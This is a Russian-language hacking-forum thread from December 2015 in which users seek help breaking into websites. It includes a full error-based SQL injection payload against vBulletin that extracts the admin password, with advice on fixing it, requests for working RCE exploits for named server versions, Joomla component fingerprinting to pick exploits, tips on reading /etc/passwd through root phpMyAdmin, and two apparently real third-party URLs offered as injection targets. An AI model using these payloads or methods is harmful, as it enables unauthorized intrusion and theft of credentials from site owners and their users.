 |
|

07.12.2015, 22:36
|
|
Познающий
Регистрация: 21.02.2014
Сообщений: 31
С нами:
6433526
Репутация:
7
|
|
Сообщение от UNIXTREID
↑
Извиняюсь за вопросы, гуглил, но как-то выдача не удалась.
..
1)Есть ли какие-то недавние рабочие RCE под такие сервисы???
nginx 1.6.2
Microsoft IIS 6.0
ASP.NET 1.1.4322
ASP.NET 2.0.50727
2)И ещё один вопрос:
зависят ли как-то версии компонентов Joomla от основной версии самой Joomla ???
Существуют ли какие-то удобные, к примеру, таблицы, где чётко сопоставляются версия компонента с версией самой CMS ??? Или компоненты обновляются только с версией CMS ? Просто чтобы раскручивать сайт, узнал версию джумлы и её установленные дополнения, вот и думаю, по какой версии подбирать эксплоит...
P.S. Чтобы не создавать нового сообщения, спрошу здесь же: )))
Joomla 2.5.7
Component: com_content
Component: com_jce
Component: com_jdownloads
Component: com_newsfeeds
Component: com_users
Component: com_xmap
Есть ли смысл и варианты ???
По первому вопросу - топаем на exploit-db и узнаем все через поиск, по второму вопросу, да, версия компонентов зависит от версии джумлы, кстати, com_jdownloads и com_xmap компоненты сторонние, в com_xmap дыр нет.
|
|
|

08.12.2015, 00:34
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от RWD
↑
вообще реально залить файл если sql time based blind? права mysql root
да, реально. https://rdot.org/forum/showthread.php?t=60
Сообщение от BlitzXX
↑
XSS:
фильтра нету,
Максимальное кол-во символов 32.
Как сделать?
Нахождение:
Код:
[XSS] бла-бла-бла...
Делал так, запрос идет, но не выполняется сам скрипт xss'ки. Проблема в (его нету)
нужен домен из трех символов.
|
|
|

08.12.2015, 15:43
|
|
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
С нами:
5745206
Репутация:
1
|
|
В общем такой вопрос взламываю способом
.SpoilerTarget" type="button">Spoiler: Скрипт
securitytoken=guest&humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=p rocess&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
В ошибке должен выходить pass (без соли на это другой скрипт)
Но выходит такая годня почему ?
Даже если соль хочу вывести всё ровно такая хрень
и это не единственный сайт где такие траблы
vBulletin
|
|
|

08.12.2015, 17:09
|
|
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами:
7502006
Репутация:
90
|
|
Сообщение от Sensoft
↑
В общем такой вопрос взламываю способом
Spoiler: Скрипт
securitytoken=guest&humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=p rocess&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
В ошибке должен выходить pass (без соли на это другой скрипт)
Но выходит такая годня почему ?

Даже если соль хочу вывести всё ровно такая хрень
и это не единственный сайт где такие траблы
vBulletin
так красным по белому же написано что таблицы user нет, information_schema рекомендую глянуть
|
|
|

11.12.2015, 15:23
|
|
Участник форума
Регистрация: 02.11.2015
Сообщений: 139
С нами:
5542166
Репутация:
1
|
|
Сообщение от profishell
↑
По первому вопросу - топаем на exploit-db и узнаем все через поиск, по второму вопросу, да, версия компонентов зависит от версии джумлы, кстати, com_jdownloads и com_xmap компоненты сторонние, в com_xmap дыр нет.
profishell, поискал на великом exploit-db:
1.По nginx есть сплоиты, но версия раньше, чем 1.6.2 (Максимум, что там есть - 1.4.0)
2.Microsoft IIS 6.0 - целая пачка, но из них несколько DoS'ов , другие какие-то старые...
3.По ASP.NET тоже половину старые, что есть нормального, то или DoS, или Padding Oracle.
По Jooml'е спасибо, буду знать. Но есть ли дыры в других компонентах, нежели com_jdownloads или com_xmap??? Я где-то видел, что com_users можно раскрутить, да и компонент распространённый. Com_newsfeeds тоже довольно интересный
|
|
|

13.12.2015, 16:03
|
|
Познающий
Регистрация: 16.08.2012
Сообщений: 92
С нами:
7231286
Репутация:
0
|
|
Ребят, кто работал по coldfusion, что-нибудь можно сделать? Какие-то нестандартные sql версии. Ну, то есть, не MSSQL/MySQL/Oracle(?) Подскажите действия... К примеру:
Код:
http://borsariimages.com/archive/public/AssetDetail.cfm?aid=S-AAS-414-PB&lid=1%27&rdir=lightboxes&rpage=ViewLightboxContents&orig=p
Код:
http://178.63.177.70/huber/huber/images/showPicture.cfm?imgNo=77447141%27&language=1
|
|
|

14.12.2015, 16:16
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами:
5797046
Репутация:
40
|
|
Всем привет. Давно я вам тут глупых вопросов не задавал, надо наверстать.
Сложилась такая штуковина есть доступ к myadmin с правами рута, всё как надо, но вот засада , нету пути, phpinfo и при выполнение команды selecl load_file('etc/passwd'); отдаётся хрень. Есть Но не НАЛ. фото
.SpoilerTarget" type="button">Spoiler

Ну да вопросы, как найти путь? Как заставить читать файлы. Мысли только подключатся с консоли и пробовать разные варианты, брут в ручную с путями var/www/site var/www/public_html/site/... может есть что-то универсальное
|
|
|

15.12.2015, 00:08
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами:
5797046
Репутация:
40
|
|
Сообщение от palec2006
↑
параметры нажми, всё там
спасибо , решили так, записали вывод в таблицу
|
|
|

15.12.2015, 23:31
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Сообщение от palec2006
↑
параметры нажми, всё там
Еще один способ ( я описывал)
Если сервер на фряхе, то при запрсое select load file('/') , то показывает все папки в корне и так далее.
|
|
|

16.12.2015, 15:11
|
|
Участник форума
Регистрация: 10.05.2015
Сообщений: 251
С нами:
5795606
Репутация:
31
|
|
Народ, кто Metasploit юзает, как задать пейлоад для выполнение кастомного php-кода, а не реверс коннект?
|
|
|
|
 |
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|